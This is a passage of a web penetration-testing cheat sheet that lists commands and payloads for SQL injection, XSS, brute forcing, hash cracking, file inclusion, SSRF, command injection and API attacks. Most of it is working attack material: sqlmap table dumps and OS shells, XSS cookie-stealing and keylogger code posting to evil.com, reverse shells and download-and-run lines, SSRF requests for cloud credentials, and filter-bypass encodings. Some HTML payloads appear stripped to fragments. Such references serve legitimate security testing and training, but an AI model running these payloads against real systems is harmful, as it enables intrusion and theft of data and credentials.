critical,high\n\n# Multiple targets\nnuclei -l targets.txt\n\n# Output formats\nnuclei -u https://target.com -o results.txt -json\n\n# Rate limiting\nnuclei -u https://target.com -rl 150 -bs 25 -c 25\n```\n\n#### Nessus (Commercial)\n```bash\n# CLI usage\nnessuscli scan new --name \"Web Scan\" --targets target.com --policy \"Web App Tests\"\nnessuscli scan launch --scan-id 123\nnessuscli report download --scan-id 123 --format html\n```\n\n#### OpenVAS\n```bash\n# Start services\nsudo gvm-start\n\n# CLI scan creation\ngvm-cli --gmp-username admin --gmp-password pass socket --socketpath /var/run/gvmd.sock --xml \"...\"\n```\n\n### Manual Testing Techniques\n\n#### Security Headers Check\n```bash\n# Check security headers\ncurl -sI https://target.com | grep -iE \"strict-transport-security|content-security-policy|x-frame-options|x-content-type-options|referrer-policy|permissions-policy\"\n\n# Using online tools\n# securityheaders.com\n# observatory.mozilla.org\n```\n\n#### Information Disclosure\n```bash\n# Check for debug pages\ncurl -s https://target.com/phpinfo.php\ncurl -s https://target.com/info\ncurl -s https://target.com/server-status\n\n# Check for version disclosure\ncurl -sI https://target.com | grep -i \"server\\|x-powered-by\"\ncurl -s https://target.com | grep -i \"generator\\|version\"\n\n# Check for error messages\ncurl -s \"https://target.com/page?id='\" | grep -i \"sql\\|error\\|warning\"\n```\n\n#### CORS Misconfiguration\n```bash\n# Test with origin header\ncurl -sI https://target.com -H \"Origin: https://evil.com\" | grep -i \"access-control-allow-origin\"\n\n# Test with null origin\ncurl -sI https://target.com -H \"Origin: null\" | grep -i \"access-control-allow-origin\"\n```\n\n#### HTTP Methods Testing\n```bash\n# Check allowed methods\ncurl -sI https://target.com -X OPTIONS | grep -i \"allow\"\n\n# Test dangerous methods\ncurl -X PUT -d \"test\" https://target.com/test.txt\ncurl -X DELETE https://target.com/test.txt\ncurl -X TRACE https://target.com\n```\n\n---\n\n## SQL Injection (SQLi)\n\n### Detection Techniques\n\n#### Manual Testing\n```bash\n# Basic payloads\n' OR '1'='1\n' OR 1=1--\n\" OR \"1\"=\"1\n1' AND '1'='1\n1' AND '1'='2\n' OR '1'='1' --\n\n# Comments\n'--\n'#\n'/*\n'\n-- \n#\n\n# Union-based detection\n' UNION SELECT NULL--\n' UNION SELECT NULL,NULL--\n' UNION SELECT NULL,NULL,NULL--\n\n# Boolean-based\n' AND 1=1--\n' AND 1=2--\n\n# Time-based\n' AND SLEEP(5)--\n' WAITFOR DELAY '00:00:05'--\n' AND 1=1 AND SLEEP(5)--\n```\n\n#### Automated Detection with SQLmap\n```bash\n# Basic detection\nsqlmap -u \"https://target.com/page?id=1\"\n\n# POST request\nsqlmap -u \"https://target.com/login\" --data=\"username=admin&amp;password=test\"\n\n# From Burp request file\nsqlmap -r request.txt\n\n# With cookie\nsqlmap -u \"https://target.com/page?id=1\" --cookie=\"session=abc123\"\n\n# Level and risk\nsqlmap -u \"https://target.com/page?id=1\" --level=5 --risk=3\n\n# Random user agent\nsqlmap -u \"https://target.com/page?id=1\" --random-agent\n\n# Batch mode (no prompts)\nsqlmap -u \"https://target.com/page?id=1\" --batch\n\n# Force SSL\nsqlmap -u \"https://target.com/page?id=1\" --force-ssl\n```\n\n### Data Extraction\n\n#### Database Enumeration\n```bash\n# Get databases\nsqlmap -u \"https://target.com/page?id=1\" --dbs\n\n# Get current database\nsqlmap -u \"https://target.com/page?id=1\" --current-db\n\n# Get current user\nsqlmap -u \"https://target.com/page?id=1\" --current-user\n\n# Get database users\nsqlmap -u \"https://target.com/page?id=1\" --users\n\n# Get database privileges\nsqlmap -u \"https://target.com/page?id=1\" --privileges\n```\n\n#### Table Enumeration\n```bash\n# Get tables from database\nsqlmap -u \"https://target.com/page?id=1\" -D database_name --tables\n\n# Get columns from table\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --columns\n\n# Dump table data\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --dump\n\n# Dump specific columns\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users -C username,password --dump\n\n# Conditional dump\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --dump --where=\"id=1\"\n```\n\n### Advanced SQLmap Techniques\n\n#### Bypass Techniques\n```bash\n# Tamper scripts\nsqlmap -u \"https://target.com/page?id=1\" --tamper=space2comment\nsqlmap -u \"https://target.com/page?id=1\" --tamper=between,randomcase\nsqlmap -u \"https://target.com/page?id=1\" --tamper=apostrophemask,apostrophenullencode\n\n# List all tamper scripts\nsqlmap --list-tampers\n\n# WAF bypass\nsqlmap -u \"https://target.com/page?id=1\" --tamper=space2comment --random-agent --flush-session\n\n# No-cast\nsqlmap -u \"https://target.com/page?id=1\" --no-cast\n\n# Hex conversion\nsqlmap -u \"https://target.com/page?id=1\" --hex\n```\n\n#### File System Access\n```bash\n# Read file\nsqlmap -u \"https://target.com/page?id=1\" --file-read=/etc/passwd\n\n# Write file\nsqlmap -u \"https://target.com/page?id=1\" --file-write=shell.php --file-dest=/var/www/html/shell.php\n\n# Check privileges\nsqlmap -u \"https://target.com/page?id=1\" --is-dba\n```\n\n#### OS Command Execution\n```bash\n# Get OS shell\nsqlmap -u \"https://target.com/page?id=1\" --os-shell\n\n# Execute command\nsqlmap -u \"https://target.com/page?id=1\" --os-cmd=\"id\"\n\n# SQL shell\nsqlmap -u \"https://target.com/page?id=1\" --sql-shell\n```\n\n### Common SQL Injection Payloads\n\n#### Authentication Bypass\n```sql\nadmin' --\nadmin' #\nadmin'/*\n' or 1=1--\n' or 1=1#\n' or 1=1/*\n') or '1'='1--\n') or ('1'='1--\n' UNION SELECT 1, 'admin', 'password'--\n```\n\n#### Union-Based Payloads\n```sql\n' UNION SELECT null, null, null--\n' UNION SELECT 1,2,3--\n' UNION SELECT 1,@@version,3--\n' UNION SELECT 1,table_name,3 FROM information_schema.tables--\n' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--\n```\n\n#### Error-Based Payloads\n```sql\n' AND extractvalue(1, concat(0x7e, database()))--\n' AND updatexml(1, concat(0x7e, database()), 1)--\n' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--\n```\n\n#### Boolean-Based Payloads\n```sql\n' AND 1=1--\n' AND 1=2--\n' AND SUBSTRING(database(),1,1)='a'--\n' AND ASCII(SUBSTRING(database(),1,1)) &gt; 100--\n```\n\n#### Time-Based Payloads\n```sql\n' AND SLEEP(5)--\n' AND BENCHMARK(10000000,MD5('a'))--\n' WAITFOR DELAY '00:00:05'--\n' AND 1=(SELECT COUNT(*) FROM sysobjects WHERE xtype='U' AND WAITFOR DELAY '00:00:05')--\n```\n\n### Second-Order SQL Injection\n```bash\n# Register with malicious payload\nsqlmap -u \"https://target.com/register\" --data=\"username=admin'--&amp;password=test\"\n\n# Trigger on another page\nsqlmap -u \"https://target.com/profile\" --cookie=\"session=abc123\" --second-url=\"https://target.com/profile\"\n```\n\n### NoSQL Injection\n```javascript\n// MongoDB\n' || '1'=='1\n' || 1==1//\n' &amp;&amp; this.password.match(/.*/)//\n' &amp;&amp; this.username.match(/admin/)//\n\n// Authentication bypass\n{ \"username\": { \"$ne\": null }, \"password\": { \"$ne\": null } }\n{ \"username\": { \"$regex\": \"admin\" }, \"password\": { \"$regex\": \"^.*\" } }\n\n// Tools\n# NoSQLMap\nnosqlmap.py --target http://target.com --attack\n```\n\n---\n\n## Cross-Site Scripting (XSS)\n\n### XSS Types\n\n#### Reflected XSS\n```html\n\nalert('XSS')\n\n\nhttps://target.com/search?q=alert(1)\n\n\n\n```\n\n#### Stored XSS\n```html\n\nalert(document.cookie)\n\n\n\n\n\n\n```\n\n#### DOM-Based XSS\n```javascript\n// URL fragment\nhttps://target.com/#alert(1)\n\n// document.write\ndocument.write(location.hash.substring(1))\n\n// innerHTML\nelement.innerHTML = location.hash.substring(1)\n\n// eval\neval(location.hash.substring(1))\n```\n\n### XSS Payloads\n\n#### Basic Alert Payloads\n```html\nalert('XSS')\nalert(1)\nalert(document.cookie)\nalert(document.domain)\nalert(document.URL)\n```\n\n#### Event Handler Payloads\n```html\n\n\n\n\nHover me\n\n\n\n```\n\n#### Attribute Breakout\n```html\n\"&gt;alert(1)\n'&gt;alert(1)\njavascript:alert(1)\n\"&gt;\n' onmouseover=alert(1) '\n```\n\n#### Encoded Payloads\n```html\n%3Cscript%3Ealert(1)%3C/script%3E\n&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;\nipt&gt;alert(1)ipt&gt;\nalert(1)\n```\n\n#### Polyglot Payloads\n```html\njavascript:/*--&gt;\n\" onclick=alert(1)//Click\n```\n\n### Advanced XSS Attacks\n\n#### Cookie Stealing\n```html\n\nfetch('https://evil.com/steal?cookie='+document.cookie)\nnew Image().src='https://evil.com/steal?c='+document.cookie\ndocument.location='https://evil.com/steal?c='+document.cookie\n\n\nfetch('https://evil.com/steal', {method:'POST', body:document.cookie, mode:'no-cors'})\n\n\nfetch('https://evil.com/steal?data='+btoa(JSON.stringify(localStorage)))\n```\n\n#### Keylogging\n```javascript\n\ndocument.onkeypress = function(e) {\n    fetch('https://evil.com/keylog?key='+e.key);\n}\n\n```\n\n#### Session Hijacking\n```html\n\nfetch('https://evil.com/steal?token='+localStorage.getItem('token'))\n\n\n\nvar token = localStorage.getItem('token');\ndocument.write('');\n\n```\n\n#### Phishing\n```html\n\n\ndocument.body.innerHTML = '\n\nSession Expired\n';\n\n```\n\n#### Port Scanning\n```javascript\n\nfor (var i=1;i&lt;=1024;i++) {\n    var img = new Image();\n    img.onload = function() { console.log('Port open: ' + i); };\n    img.onerror = function() { console.log('Port closed: ' + i); };\n    img.src = 'http://localhost:' + i;\n}\n\n```\n\n### XSS Testing Tools\n\n#### Dalfox\n```bash\n# Basic scan\ndalfox url https://target.com/page?q=test\n\n# File input\ndalfox file urls.txt\n\n# With cookie\ndalfox url https://target.com/page?q=test --cookie \"session=abc123\"\n\n# Blind XSS\ndalfox url https://target.com/page?q=test --blind \"https://xsshunter.com\"\n\n# Output formats\ndalfox url https://target.com/page?q=test --output results.txt --format json\n\n# Custom payloads\ndalfox url https://target.com/page?q=test --custom-payload-file payloads.txt\n```\n\n#### XSStrike\n```bash\n# Basic scan\npython3 xsstrike.py -u \"https://target.com/page?q=test\"\n\n# POST request\npython3 xsstrike.py -u \"https://target.com/search\" --data \"q=test\"\n\n# Crawl and test\npython3 xsstrike.py -u \"https://target.com\" --crawl\n\n# Skip DOM checking\npython3 xsstrike.py -u \"https://target.com/page?q=test\" --skip-dom\n```\n\n#### XSSer\n```bash\n# Basic scan\nxsser -u \"https://target.com/page?q=test\"\n\n# POST request\nxsser -u \"https://target.com/login\" --post=\"user=test&amp;pass=test\"\n\n# Auto\nxsser --auto \"https://target.com/page?q=test\"\n\n# Crawler\nxsser --crawler \"https://target.com\"\n```\n\n### XSS Prevention Bypass\n\n#### WAF Bypass Techniques\n```html\n\nalert(1)\n\n\npt&gt;alert(1)ript&gt;\n\n\n\nalert(1)\n\n\n\n&lt;\tscript\t&gt;alert(1)&lt;/\tscript\t&gt;\n\n\n%3cscript%3ealert(1)%3c/script%3e\n\n\n%253cscript%253ealert(1)%253c/script%253e\n\n\n+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n\n\n\n\n\n&lt;\u017fcript&gt;alert(1)&lt;/\u017fcript&gt;\n```\n\n#### CSP Bypass\n```html\n\nalert(1)\n\n\neval('alert(1)')\n\n\n\n\n\n\n\n\n\n\n```\n\n---\n\n## Authentication Attacks\n\n### Brute Force Tools\n\n#### Hydra\n```bash\n# HTTP POST form\nhydra -l admin -P rockyou.txt target.com http-post-form \"/login:username=^USER^&amp;password=^PASS^:Invalid\"\n\n# HTTP GET with basic auth\nhydra -L users.txt -P pass.txt target.com http-get /protected\n\n# HTTPS POST\nhydra -l admin -P pass.txt -s 443 target.com https-post-form \"/login:user=^USER^&amp;pass=^PASS^:F=incorrect\"\n\n# With cookies\nhydra -l admin -P pass.txt target.com http-post-form \"/login:username=^USER^&amp;password=^PASS^&amp;cookie=value:H=session=abc123:F=Invalid\"\n\n# Multiple threads\nhydra -L users.txt -P pass.txt -t 16 target.com http-post-form \"/login:username=^USER^&amp;password=^PASS^:Invalid\"\n\n# Output\nhydra -L users.txt -P pass.txt target.com http-post-form \"/login:user=^USER^&amp;pass=^PASS^:Invalid\" -o results.txt\n\n# SSH\nhydra -L users.txt -P pass.txt ssh://target.com\n\n# FTP\nhydra -l admin -P pass.txt ftp://target.com\n\n# SMTP\nhydra -l admin@target.com -P pass.txt smtp://target.com\n\n# MySQL\nhydra -l root -P pass.txt mysql://target.com\n\n# RDP\nhydra -L users.txt -P pass.txt rdp://target.com\n\n# SMB\nhydra -L users.txt -P pass.txt smb://target.com\n```\n\n#### Medusa\n```bash\n# HTTP\nmedusa -h target.com -U users.txt -P pass.txt -M http -m DIR:/login -T 10\n\n# SSH\nmedusa -h target.com -U users.txt -P pass.txt -M ssh -T 4\n\n# FTP\nmedusa -h target.com -U users.txt -P pass.txt -M ftp\n\n# MySQL\nmedusa -h target.com -U users.txt -P pass.txt -M mysql\n```\n\n#### Patator\n```bash\n# HTTP POST\npatator http_fuzz url=https://target.com/login method=POST body='user=FILE0&amp;pass=FILE1' 0=users.txt 1=pass.txt -x ignore:fgrep='Invalid'\n\n# FTP\npatator ftp_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Login incorrect'\n\n# SSH\npatator ssh_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Authentication failed'\n```\n\n### Dictionary Attacks with Hashcat\n\n#### Hash Identification\n```bash\n# Identify hash type\nhashid hash.txt\nhash-identifier hash\n```\n\n#### Common Hash Modes\n```bash\n# MD5\nhashcat -m 0 hash.txt rockyou.txt\n\n# SHA1\nhashcat -m 100 hash.txt rockyou.txt\n\n# SHA256\nhashcat -m 1400 hash.txt rockyou.txt\n\n# SHA512\nhashcat -m 1800 hash.txt rockyou.txt\n\n# NTLM\nhashcat -m 1000 hash.txt rockyou.txt\n\n# bcrypt\nhashcat -m 3200 hash.txt rockyou.txt\n\n# WordPress\nhashcat -m 400 hash.txt rockyou.txt\n\n# Joomla\nhashcat -m 400 hash.txt rockyou.txt\n\n# Drupal\nhashcat -m 7900 hash.txt rockyou.txt\n```\n\n#### Attack Modes\n```bash\n# Straight (wordlist)\nhashcat -a 0 -m 0 hash.txt rockyou.txt\n\n# Combination\nhashcat -a 1 -m 0 hash.txt wordlist1.txt wordlist2.txt\n\n# Mask attack (brute force)\nhashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l\n\n# Hybrid wordlist + mask\nhashcat -a 6 -m 0 hash.txt rockyou.txt ?d?d?d\n\n# Hybrid mask + wordlist\nhashcat -a 7 -m 0 hash.txt ?d?d?d rockyou.txt\n\n# Rule-based\nhashcat -a 0 -m 0 hash.txt rockyou.txt -r best64.rule\n```\n\n#### Rules and Masks\n```bash\n# Common masks\n?l = lowercase (a-z)\n?u = uppercase (A-Z)\n?d = digits (0-9)\n?s = special (!@#$%^&amp;*)\n?a = all (l,u,d,s)\n?b = binary (0x00-0xff)\n\n# Examples\n?l?l?l?l?l = 5 lowercase\n?u?l?l?l?d?d = Capital + 3 lowercase + 2 digits\n?d?d?d?d?d?d = 6 digits\n?a?a?a?a?a?a = 6 any characters\n\n# Built-in rules\n/usr/share/hashcat/rules/best64.rule\n/usr/share/hashcat/rules/d3ad0ne.rule\n/usr/share/hashcat/rules/OneRuleToRuleThemAll.rule\n```\n\n### John the Ripper\n\n```bash\n# Basic crack\njohn --wordlist=rockyou.txt hash.txt\n\n# With format\njohn --format=raw-md5 --wordlist=rockyou.txt hash.txt\n\n# Show results\njohn --show hash.txt\n\n# Single crack mode\njohn --single hash.txt\n\n# Incremental (brute force)\njohn --incremental hash.txt\n\n# Rules\njohn --wordlist=rockyou.txt --rules hash.txt\n\n# Shadow file\nunshadow passwd shadow &gt; combined.txt\njohn --wordlist=rockyou.txt combined.txt\n\n# SSH private key\nssh2john id_rsa &gt; id_rsa.hash\njohn --wordlist=rockyou.txt id_rsa.hash\n```\n\n### Authentication Bypass Techniques\n\n#### SQL Injection Bypass\n```sql\nadmin' --\nadmin' #\nadmin'/*\n' or 1=1--\n' or 1=1#\n' or 1=1/*\n') or '1'='1--\n') or ('1'='1--\n' UNION SELECT 1,'admin','password'--\n' UNION SELECT NULL,NULL,NULL--\n```\n\n#### Parameter Tampering\n```http\n# Change user ID\nGET /profile?user_id=1\nGET /profile?user_id=2\n\n# Change role parameter\nPOST /admin\nrole=user \u2192 role=admin\n\n# Boolean parameters\nisAdmin=false \u2192 isAdmin=true\nadmin=0 \u2192 admin=1\n\n# Array parameters\nuser_ids[]=1 \u2192 user_ids[]=2\n```\n\n#### JWT Attacks\n```bash\n# Decode JWT\necho \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\" | base64 -d\n\n# JWT tool\njwt_tool token.jwt -T\n\n# Change algorithm to none\njwt_tool token.jwt -X a\n\n# Brute force secret\njwt_tool token.jwt -C -d rockyou.txt\n\n# Kid injection\njwt_tool token.jwt -I -hc kid -hv \"../../../dev/null\"\n```\n\n#### OAuth Misconfiguration\n```http\n# Redirect URI manipulation\nhttps://target.com/oauth/callback?code=xxx&amp;state=yyy\nhttps://evil.com/oauth/callback?code=xxx&amp;state=yyy\n\n# CSRF on OAuth\n\n\n# Scope escalation\nscope=read \u2192 scope=read+write\n```\n\n#### Session Fixation\n```http\n# Set session before login\nGET /login?PHPSESSID=attacker_session\n\n# After login, same session ID is authenticated\nGET /profile HTTP/1.1\nCookie: PHPSESSID=attacker_session\n```\n\n#### 2FA Bypass\n```http\n# Response manipulation\nHTTP/1.1 302 Found\nLocation: /2fa\n\n# Change to:\nHTTP/1.1 302 Found\nLocation: /dashboard\n\n# Parameter tampering\n2fa=123456 \u2192 2fa=000000\n\n# Null parameter\n2fa=123456 \u2192 2fa=\n\n# OTP reuse\n```\n\n---\n\n## File Inclusion Vulnerabilities\n\n### Local File Inclusion (LFI)\n\n#### Basic LFI\n```http\n# Directory traversal\nhttps://target.com/page?file=../../etc/passwd\nhttps://target.com/page?file=..\\..\\..\\windows\\win.ini\n\n# URL encoded\nhttps://target.com/page?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd\nhttps://target.com/page?file=..%252f..%252fetc%252fpasswd\n\n# Double encoding\nhttps://target.com/page?file=%25%32%65%25%32%65%25%32%66etc%25%32%66passwd\n```\n\n#### LFI with Null Byte (PHP &lt; 5.3)\n```http\nhttps://target.com/page?file=../../etc/passwd%00\nhttps://target.com/page?file=../../etc/passwd%00.php\n```\n\n#### LFI with Path Truncation\n```http\nhttps://target.com/page?file=../../../../etc/passwd......................\nhttps://target.com/page?file=../../../../etc/passwd////////////////////\n```\n\n#### LFI Wrappers\n```php\n# PHP filter wrapper (read source)\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=index.php\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd\n\n# PHP input wrapper (execute code)\nPOST /page?file=php://input HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n\n\n# PHP expect wrapper (if enabled)\nhttps://target.com/page?file=expect://id\n\n# Data wrapper\nhttps://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+\n\n# File wrapper\nhttps://target.com/page?file=file:///etc/passwd\n\n# Zip wrapper\nhttps://target.com/page?file=zip://shell.jpg#shell.php\n```\n\n### Remote File Inclusion (RFI)\n\n```http\n# Basic RFI\nhttps://target.com/page?file=http://evil.com/shell.txt\nhttps://target.com/page?file=https://evil.com/shell.php\nhttps://target.com/page?file=ftp://evil.com/shell.txt\n\n# With URL encoding\nhttps://target.com/page?file=http%3A%2F%2Fevil.com%2Fshell.txt\n\n# PHP wrapper\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=http://evil.com/shell.php\n```\n\n### Log Poisoning\n\n```bash\n# Apache access log poisoning\n# Inject PHP code in User-Agent\ncurl -A \"\" https://target.com\n\n# Then include log file\nhttps://target.com/page?file=/var/log/apache2/access.log\n\n# SSH log poisoning\nssh ''@target.com\nhttps://target.com/page?file=/var/log/auth.log\n\n# Mail log poisoning\ntelnet target.com 25\nMAIL FROM: \nRCPT TO: victim@localhost\nDATA\nSubject: test\ntest\n.\n\nhttps://target.com/page?file=/var/log/mail.log\n```\n\n### LFI to RCE\n\n```bash\n# Proc self/environ poisoning\ncurl -H \"User-Agent: \" https://target.com\nhttps://target.com/page?file=/proc/self/environ\n\n# Session file poisoning\n# First, set session variable\nhttps://target.com/page?file=\n# Then include session file\nhttps://target.com/page?file=/var/lib/php/sessions/sess_\n\n# Temp file upload (race condition)\n# Upload file, then include before cleanup\nhttps://target.com/page?file=/tmp/php\n```\n\n### LFI Discovery Wordlist\n```bash\n# Common LFI files\n/etc/passwd\n/etc/shadow\n/etc/hosts\n/etc/apache2/apache2.conf\n/etc/nginx/nginx.conf\n/var/log/apache2/access.log\n/var/log/nginx/access.log\n/var/log/auth.log\n/var/log/mail.log\n/proc/self/environ\n/proc/self/cmdline\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/2\nC:\\boot.ini\nC:\\windows\\win.ini\nC:\\windows\\system32\\drivers\\etc\\hosts\n```\n\n---\n\n## Server-Side Request Forgery (SSRF)\n\n### Basic SSRF\n\n```http\n# Localhost access\nhttps://target.com/fetch?url=http://127.0.0.1/\nhttps://target.com/fetch?url=http://localhost/\nhttps://target.com/fetch?url=http://[::1]/\nhttps://target.com/fetch?url=http://0.0.0.0/\n\n# Decimal IP\nhttps://target.com/fetch?url=http://2130706433/ (127.0.0.1)\nhttps://target.com/fetch?url=http://3232235521/ (192.168.0.1)\n\n# Octal IP\nhttps://target.com/fetch?url=http://0177.0.0.1/\nhttps://target.com/fetch?url=http://0x7f.0x0.0x0.0x1/\n\n# Domain tricks\nhttps://target.com/fetch?url=http://localhost.127.0.0.1.nip.io/\nhttps://target.com/fetch?url=http://127.0.0.1.xip.io/\n```\n\n### Cloud Metadata SSRF\n\n```bash\n# AWS metadata\nhttps://target.com/fetch?url=http://169.254.169.254/latest/meta-data/\nhttps://target.com/fetch?url=http://169.254.169.254/latest/user-data/\nhttps://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n\n# GCP metadata\nhttps://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/\nhttps://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n-H \"Metadata-Flavor: Google\"\n\n# Azure metadata\nhttps://target.com/fetch?url=http://169.254.169.254/metadata/instance?api-version=2017-08-01\n-H \"Metadata: true\"\n\n# Digital Ocean metadata\nhttps://target.com/fetch?url=http://169.254.169.254/metadata/v1.json\n```\n\n### Internal Network Scanning\n\n```bash\n# Port scan with SSRF\nfor port in {1..1024}; do\n    curl -s \"https://target.com/fetch?url=http://192.168.1.1:$port\" \\\n        | grep -q \"Connection refused\" || echo \"Port $port open\"\ndone\n\n# Discover internal IP ranges\nfor ip in {1..254}; do\n    curl -s \"https://target.com/fetch?url=http://10.0.0.$ip:80\" \\\n        -m 1 | grep -q \"Connection refused\" || echo \"10.0.0.$ip alive\"\ndone\n```\n\n### SSRF Bypass Techniques\n\n```bash\n# URL encoding\nhttps://target.com/fetch?url=http://%31%32%37%2E%30%2E%30%2E%31/\n\n# Double URL encoding\nhttps://target.com/fetch?url=http://%2531%2532%2537%252E%2530%252E%2530%252E%2531/\n\n# Redirect bypass\n# First, set up redirector\nhttps://evil.com/redirect?url=http://127.0.0.1:80\n# Then SSRF to redirector\nhttps://target.com/fetch?url=http://evil.com/redirect\n\n# DNS rebinding\n# Use dnsrebinder.net\nhttps://target.com/fetch?url=http://127.0.0.1.dnsrebinder.net\n\n# IPv6 bypass\nhttps://target.com/fetch?url=http://[::1]:80/\nhttps://target.com/fetch?url=http://[::ffff:7f00:0001]/\n\n# Alternative localhost representations\n127.0.0.0\n127.127.127.127\n127.0.1.3\n2130706433\n0x7f000001\n0177.0.0.1\n```\n\n### SSRF to RCE\n\n```bash\n# Internal Redis\nhttps://target.com/fetch?url=gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a\n\n# Internal Memcached\nhttps://target.com/fetch?url=gopher://127.0.0.1:11211/_stats\n\n# Internal MySQL\nhttps://target.com/fetch?url=mysql://127.0.0.1:3306/\n\n# Internal Elasticsearch\nhttps://target.com/fetch?url=http://127.0.0.1:9200/_cat/indices\n\n# Internal MongoDB\nhttps://target.com/fetch?url=mongodb://127.0.0.1:27017/\n```\n\n### SSRF with Different Protocols\n\n```bash\n# File protocol\nhttps://target.com/fetch?url=file:///etc/passwd\n\n# Dict protocol\nhttps://target.com/fetch?url=dict://127.0.0.1:3306/info\n\n# Gopher protocol\nhttps://target.com/fetch?url=gopher://127.0.0.1:8080/_GET%20/HTTP/1.0%0a%0a\n\n# FTP protocol\nhttps://target.com/fetch?url=ftp://anonymous:anonymous@127.0.0.1:21/\n\n# SFTP protocol\nhttps://target.com/fetch?url=sftp://user:pass@127.0.0.1:22/\n\n# TFTP protocol\nhttps://target.com/fetch?url=tftp://127.0.0.1:69/test\n```\n\n---\n\n## Command Injection\n\n### Basic Command Injection\n\n```bash\n# Command separators\n; id\n| id\n|| id\n&amp; id\n&amp;&amp; id\n`id`\n$(id)\n\n# URL encoded\n%3Bid\n%7Cid\n%26%26id\n\n# Newline encoded\n%0aid\n```\n\n### Blind Command Injection\n\n```bash\n# Time-based\n; sleep 5\n| sleep 5\n&amp; ping -c 10 127.0.0.1\n&amp;&amp; sleep 5\n\n# Output-based (if output is not returned)\n; wget http://evil.com/`whoami`\n| curl http://evil.com/$(id)\n&amp; nslookup `hostname`.evil.com\n```\n\n### Command Injection Payloads\n\n```bash\n# Linux\n; id\n| id\n|| id\n&amp; id\n&amp;&amp; id\n`id`\n$(id)\n; cat /etc/passwd\n| nc -e /bin/sh evil.com 4444\n&amp; bash -i &gt;&amp; /dev/tcp/evil.com/4444 0&gt;&amp;1\n`wget http://evil.com/shell.sh -O /tmp/shell.sh &amp;&amp; bash /tmp/shell.sh`\n\n# Windows\n&amp; whoami\n| dir\n&amp; ping -n 5 127.0.0.1\n&amp; powershell -c \"Invoke-WebRequest -Uri http://evil.com/shell.exe -OutFile C:\\shell.exe\"\n```\n\n### Command Injection Bypass\n\n```bash\n# Space bypass\n${IFS}id\n{cat,/etc/passwd}\ncat${IFS}/etc/passwd\ncat&lt; /etc/passwd\ncat&gt;/etc/passwd\n\n# Character blacklist bypass\nc\\a\\t /etc/passwd\ncat /etc/pa??wd\ncat /etc/pass*\ncat /e'tc'/pa'ss'wd\necho \"Y2F0IC9ldGMvcGFzc3dk\" | base64 -d | bash\n\n# Command substitution\na=id; $a\nb=cat; $b /etc/passwd\nc=\"whoami\"; eval $c\n\n# Wildcards\n/???/?at /???/pass?? (cat /etc/passwd)\n/???/n? -e /???/pass?? (nc -e /bin/sh)\n```\n\n### Environment Variable Injection\n\n```bash\n# PATH manipulation\nPATH=/tmp:$PATH evil_binary\n\n# LD_PRELOAD injection\nLD_PRELOAD=/tmp/malicious.so vulnerable_binary\n\n# IFS injection\nIFS=,;`cat&lt;&lt;\" https://api.target.com/users\n\n# API key\ncurl -H \"X-API-Key: 123456\" https://api.target.com/users\ncurl \"https://api.target.com/users?api_key=123456\"\n\n# Basic auth\ncurl -u username:password https://api.target.com/users\n\n# OAuth2\ncurl -H \"Authorization: Bearer \" https://api.target.com/users\n```\n\n#### Parameter Fuzzing\n```bash\n# IDOR testing\ncurl https://api.target.com/users/1\ncurl https://api.target.com/users/2\ncurl https://api.target.com/users/1000\n\n# Parameter pollution\ncurl \"https://api.target.com/search?q=test&amp;q=admin\"\n\n# JSON injection\ncurl -X POST https://api.target.com/users \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\"name\":\"test\",\"role\":\"admin\"}'\n\n# Mass assignment\ncurl -X PUT https://api.target.com/users/1 \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\"name\":\"test\",\"isAdmin\":true,\"balance\":999999}'\n```\n\n### GraphQL Testing\n\n#### Introspection\n```graphql\n# Get all types\n{\n  __schema {\n    types {\n      name\n      fields {\n        name\n        type {\n          name\n          kind\n        }\n      }\n    }\n  }\n}\n\n# Get queries\n{\n  __schema {\n    queryType {\n      fields {\n        name\n        args {\n          name\n          type {\n            name\n            kind\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n#### Query Examples\n```graphql\n# Basic query\n{\n  user(id: 1) {\n    name\n    email\n    posts {\n      title\n    }\n  }\n}\n\n# Mutation\nmutation {\n  createUser(input: {name: \"test\", email: \"test@test.com\"}) {\n    id\n    name\n  }\n}\n\n# Fragments\nfragment UserFields on User {\n  id\n  name\n  email\n}\n\nquery {\n  user(id: 1) {\n    ...UserFields\n  }\n}\n\n# Aliases\n{\n  user1: user(id: 1) {\n    name\n  }\n  user2: user(id: 2) {\n    name\n  }\n}\n```\n\n#### GraphQL Attacks\n```graphql\n# Deep nested query (DoS)\nquery {\n  user(id: 1) {\n    posts {\n      comments {\n        user {\n          posts {\n            comments {\n              user {\n                posts {\n                  title\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n\n# Alias-based attack\nquery {\n  a: user(id: 1) { name }\n  b: user(id: 1) { name }\n  c: user(id: 1) { name }\n  # ... repeated many 